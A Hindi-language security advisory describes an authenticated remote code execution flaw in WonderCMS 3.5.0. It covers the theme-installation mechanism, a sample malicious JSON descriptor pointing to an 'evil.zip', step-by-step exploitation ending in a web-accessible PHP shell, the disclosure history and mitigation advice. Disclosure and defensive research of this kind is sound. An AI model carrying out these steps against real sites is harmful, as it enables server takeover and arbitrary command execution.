
WonderCMS 3.5.0 के लिए प्रमाणित RCE शोषण, दुर्भावनापूर्ण थीम इंस्टॉलेशन के माध्यम से। इसमें कमजोरी की कार्यप्रणाली, PoC, और सुरक्षा परीक्षण और शिक्षा के लिए शमन मार्गदर्शन शामिल है।
WonderCMS v3.5.0 में एक प्रमाणित दूरस्थ कोड निष्पादन (RCE) भेद्यता मौजूद है।
यह समस्या एप्लिकेशन द्वारा JSON डिस्क्रिप्टर के माध्यम से दूरस्थ थीम/मॉड्यूल इंस्टॉलेशन को संभालने के तरीके से उत्पन्न होती है। जब कोई व्यवस्थापक एक ZIP संग्रह का संदर्भ देने वाली दूरस्थ JSON फ़ाइल सबमिट करता है, तो उसकी सामग्री वेब-सुलभ निर्देशिका (जैसे, /themes/) में निकाली जाती है। यदि ZIP में कोई PHP फ़ाइल है, तो वह फ़ाइल वेब पर सुलभ हो जाती है और निष्पादित की जा सकती है।
यह व्यवहार निम्नलिखित कारणों से RCE जोखिम उत्पन्न करता है:
नोट: व्यवस्थापक प्रमाणीकरण आवश्यक है, लेकिन डिफ़ॉल्ट इंस्टॉलेशन व्यवस्थापक पासवर्ड को सार्वजनिक रूप से (होमपेज पर) उजागर करते हैं, केवल पासवर्ड लॉगिन का उपयोग करते हैं, और मजबूत प्रमाणीकरण नियंत्रण लागू नहीं करते हैं।
WonderCMS दूरस्थ मॉड्यूल/थीम स्वीकार करेगा और उन्हें स्थापित करने का प्रयास करेगा यदि सबमिट किया गया JSON डिस्क्रिप्टर अपेक्षित wcms-modules.json प्रारूप से मेल खाता है। एक डिस्क्रिप्टर जो प्रारूप जांच पास करता है (और एक ZIP संग्रह की ओर इशारा करता है) को लाया जाएगा और उसके संग्रह की सामग्री को फ़ाइल प्रकारों के आगे सत्यापन के बिना वेब-सुलभ निर्देशिका (जैसे, ) में निकाला जाएगा।
/themes/<name>/उदाहरण डिस्क्रिप्टर :
{
"themes": {
"SSRF": {
"name": "FAKE",
"repo": "https://example.com/",
"zip": "https://example.com/evil.zip",
"summary": "test",
"version": "1.0.0",
"image": "https://example.com/fake.png"
}
}
}
चेतावनी: उत्पादन प्रणालियों पर न चलाएं। केवल अधिकृत परीक्षण वातावरण का उपयोग करें।
डिफ़ॉल्ट WonderCMS इंस्टॉलेशन के सार्वजनिक रूप से उजागर होमपेज से व्यवस्थापक पासवर्ड प्राप्त करें।
व्यवस्थापक पैनल में लॉग इन करें।
थीम इंस्टॉलेशन अनुभाग पर जाएं।
एक दुर्भावनापूर्ण JSON डिस्क्रिप्टर का URL प्रदान करें (जैसे, हमलावर-नियंत्रित सर्वर पर होस्ट किया गया)।
इंस्टॉलेशन आरंभ करें। सर्वर निम्नलिखित कार्य करेगा:
डाउनलोड की गई दुर्भावनापूर्ण थीम स्थापित करें।
मनमाने आदेशों को निष्पादित करने के लिए निकाली गई PHP शेल तक पहुंचें (जैसे, http://target.com/themes/<Theme_Name>/shell.php)।
(नोट: इन चरणों को केवल नियंत्रित परीक्षण वातावरण में ही करें। लाइव सिस्टम पर बिना प्राधिकरण के इस भेद्यता का शोषण करना गैरकानूनी है।)
जुलाई 2025 में भेद्यता की सूचना WonderCMS अनुरक्षकों को दी गई थी।
अनुरक्षकों ने रिपोर्ट स्वीकार की लेकिन कहा कि उनके विचार में, यह व्यवहार व्यवस्थापकों के लिए स्वीकार्य है।
जोखिम कम करने के लिए:
themes/ या plugins/ के अंदर निष्पादन योग्य फ़ाइलों तक पहुंच रोकें।यह जानकारी रक्षात्मक सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए प्रदान की गई है। भेद्यताओं का परीक्षण या खुलासा करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें।